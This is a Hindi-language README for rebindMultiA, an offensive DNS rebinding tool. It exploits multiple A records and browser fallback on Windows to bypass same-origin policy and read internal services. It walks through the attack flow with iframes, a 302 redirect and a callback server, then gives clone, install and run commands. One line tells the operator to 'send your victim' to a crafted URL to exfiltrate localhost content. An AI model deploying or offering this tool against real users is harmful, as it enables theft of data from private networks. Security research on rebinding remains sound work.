
DNS रिबाइंडिंग आक्रमण उपकरण जो समान-उत्पत्ति नीति को दरकिनार करने और ब्राउज़र फ़ॉलबैक व्यवहार के माध्यम से आंतरिक नेटवर्क सेवाओं से डेटा निकालने के लिए कई A रिकॉर्ड का शोषण करता है।
rebindMultiA एक उपकरण है जो Multiple A Record rebind attack को अंजाम देने के लिए है।
rebindmultia.com एक डोमेन है जिसे मैंने इन हमलों में सहायता के लिए सेट किया है। यह प्रत्येक IP को डोमेन [IP].ns.rebindmultia.com के लिए अपना आधिकारिक नेमसर्वर बनाता है। उदाहरण के लिए, 13.33.33.37.ns.rebindmultia.com का आधिकारिक नेमसर्वर 13.33.33.37.ip.rebindmultia.com है जो (जैसा कि आपने अनुमान लगाया होगा) 13.33.33.37 पर रिज़ॉल्व होता है।
Multiple A Record Rebind हमला DNS Rebinding का एक प्रकार है जो हमलावर की DNS अनुरोध के जवाब में दो IP पतों के साथ प्रतिक्रिया देने की क्षमता और ब्राउज़र की प्रवृत्ति का उपयोग करता है जब पहला IP प्रतिक्रिया नहीं देता तो DNS प्रतिक्रिया में दूसरे IP पर वापस आ जाता है। इस हमले में, हमलावर एक दुर्भावनापूर्ण DNS सर्वर और दो दुर्भावनापूर्ण HTTP सर्वर कॉन्फ़िगर करेगा। DNS सर्वर दो A रिकॉर्ड के साथ प्रतिक्रिया देगा:
127.0.0.1.target.13.33.33.37.ns.rebindmultia.com. 0 IN A 13.33.33.37
127.0.0.1.target.13.33.33.37.ns.rebindmultia.com. 0 IN A 127.0.0.1
पीड़ित का ब्राउज़र पहले IP से कनेक्ट होगा और हमलावर के पहले दुर्भावनापूर्ण HTTP सर्वर के साथ संवाद करना शुरू करेगा। यह सर्वर एक पेज के साथ प्रतिक्रिया देगा जिसमें दो iframes होंगे, एक /steal के लिए और एक /rebind के लिए। /steal iframe दूसरे iframe में प्रवेश करने और सामग्री को चुराने के लिए एक दुर्भावनापूर्ण पेज लोड करेगा। /rebind एंडपॉइंट, जब हिट किया जाता है, तो / पर 302 रीडायरेक्ट जारी करेगा और पहले दुर्भावनापूर्ण HTTP सर्वर को समाप्त कर देगा। परिणामस्वरूप, जब ब्राउज़र वापस हमलावर के HTTP सर्वर तक पहुँचता है, तो इसे एक बंद पोर्ट का सामना करना पड़ेगा। इस प्रकार, यह दूसरे IP पर वापस आ जाएगा। एक बार जब लक्ष्य सामग्री दूसरे iframe में लोड हो जाती है, तो पहला iframe उसमें प्रवेश कर सकता है, डेटा चुरा सकता है, और इसे हमलावर के दूसरे दुर्भावनापूर्ण HTTP सर्वर - कॉलबैक सर्वर पर बाहर निकाल सकता है।
यह हमला केवल Windows वातावरण में काम करता है। Linux और Mac पहले निजी IP पर डिफ़ॉल्ट होंगे और हमलावर के सर्वर से कभी पूछताछ नहीं की जाएगी।

127.0.0.1.target.13.33.33.37.ns.rebindmultia.com को रिज़ॉल्व करता है।server.py में शामिल) अनुरोधित DNS नाम को पार्स करता है और दो A रिकॉर्ड लौटाता है: 13.33.33.37 और 127.0.0.1।server.py में शामिल) तक पहुँचता है और /parent पेज लोड करता है जिसमें दो iframes हैं।/steal लोड करता है।/rebind लोड करता है जिसके परिणामस्वरूप / पर 302 रीडायरेक्ट होता है (HTTP सर्वर इस अनुरोध के बाद बाहर निकल जाएगा)।302 के अनुसार / पर रीडायरेक्ट करता है।/ लोड करने का प्रयास करता है, लेकिन ऐसा करने में विफल रहता है।pip3 install -r requirements.txt
python3 server.py --help
usage: server.py [-h] [-p PORT] [-c CALLBACK_PORT] [-d DNS_PORT] [-f FILE] [-l LOCATION]
optional arguments:
-h, --help show this help message and exit
-p PORT, --port PORT Specify port to attack on targetIp. Default: 80
-c CALLBACK_PORT, --callback-port CALLBACK_PORT
Specify the callback HTTP server port. Default: 31337
-d DNS_PORT, --dns-port DNS_PORT
Specify the DNS server port. Default: 53
-f FILE, --file FILE Specify the HTML file to display in the first iframe.(The "steal" iframe). Default: steal.html
-l LOCATION, --location LOCATION
Specify the location of the data you'd like to steal on the target. Default: /
यदि आपको यह त्रुटि मिलती है:
┬─[justin@RhynoDroplet:~/p/rebindMultiA]─[14:26:24]─[G:master=]
╰─>$ python3 server.py
Traceback (most recent call last):
File "server.py", line 2, in <module>
from http.server import HTTPServer, BaseHTTPRequestHandler, ThreadingHTTPServer
ImportError: cannot import name 'ThreadingHTTPServer'
तो आपको Python के अधिक अद्यतन संस्करण का उपयोग करने की आवश्यकता है। Python 3.7+।
इसे सार्वजनिक रूप से सुलभ IP से निष्पादित किया जाना चाहिए।
git clone https://github.com/Rhynorater/rebindMultiA
cd rebindMutliA
pip3 install -r requirements.txt
echo "Send your victim to http://127.0.0.1.target.`curl -s http://ipinfo.io/ip`.ns.rebindmultia.com/parent to exfil 127.0.0.1"
sudo python3 server.py
127.0.0.1 पर रिज़ॉल्व करता है। फिर वह उस सर्वर तक पहुँचता है और iframe में पेज लोड करता है।steal iframe नए लोड किए गए दूसरे iframe में प्रवेश करता है और सामग्री को पकड़ लेता है।steal iframe फिर परिणामों को हमलावर के कॉलबैक सर्वर पर वापस भेजता है।